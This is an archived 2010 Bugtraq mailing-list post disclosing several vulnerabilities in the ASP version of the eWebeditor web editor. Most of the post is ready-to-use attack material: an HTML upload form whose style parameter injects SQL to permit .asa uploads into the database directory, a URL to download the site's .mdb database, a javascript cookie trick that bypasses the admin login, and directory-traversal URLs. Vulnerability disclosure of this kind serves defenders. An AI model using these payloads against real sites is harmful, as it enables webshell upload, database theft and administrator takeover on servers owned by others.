lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Date: Sat, 30 Jan 2010 03:01:57 -0700
From: info@...uritylab.ir
To: bugtraq@...urityfocus.com
Subject: eWebeditor ASP Version Multiple Vulnerabilities

#################################################################
# Securitylab.ir
#################################################################
# Application Info:
# Name: eWebeditor
# Version: ASP
#################################################################
Vulnerability:

=======================
Arbitrary File Upload
=======================
<form action = "http://site.com/manage/ewebeditor/upload.asp?action=save&type=IMAGE&style=luoye 'union select S_ID, S_Name, S_Dir, S_CSS, [S_UploadDir]% 2b' / .. / db ', S_Width, S_Height, S_Memo, S_IsSys, S_FileExt, S_FlashExt, [S_ImageExt]% 2b' | asa ', S_MediaExt, S_FileSize, S_FlashSize, S_ImageSize, S_MediaSize, S_StateFlag, S_DetectFromWord, S_InitMode, S_BaseUrl from ewebeditor_style where s_name =' standard 'and'a' = 'a "method = post name = myform enctype =" multipart / form-data "> 
<p align="center"> 
<input type=file name=uploadfile size=100><br> <br> 
<input type=submit value=Upload>&nbsp; </p>
</form> 


=======================
Arbitrary File Upload 2
=======================
http://site.com/admin/ewebeditor/ewebeditor.htm?id=body&style=popup 


=======================
Database Disclosure
=======================
http://site.com/ewebeditor/db/ewebeditor.mdb 


=======================
Administrator bypass
=======================
http://site.com/eWebEditor/admin/login.asp

put this code instead URL
javascript: alert (document.cookie = "adminpass =" + escape ( "admin"));


=======================
Directory Traversal
=======================
http://site.com/admin/ewebeditor/admin/upload.asp?id=16&d_viewmode=&dir=./..


=======================
Directory Traversal 2
=======================
http://site.com/ewebeditor/asp/browse.asp?style=standard650&dir=./..


#################################################################
# Discoverd By: Pouya Daneshmand
# Website: http://securitylab.ir
# Contacts: info[at]securitylab.ir & whh_iran@...oo.com
###################################################################

Powered by blists - more mailing lists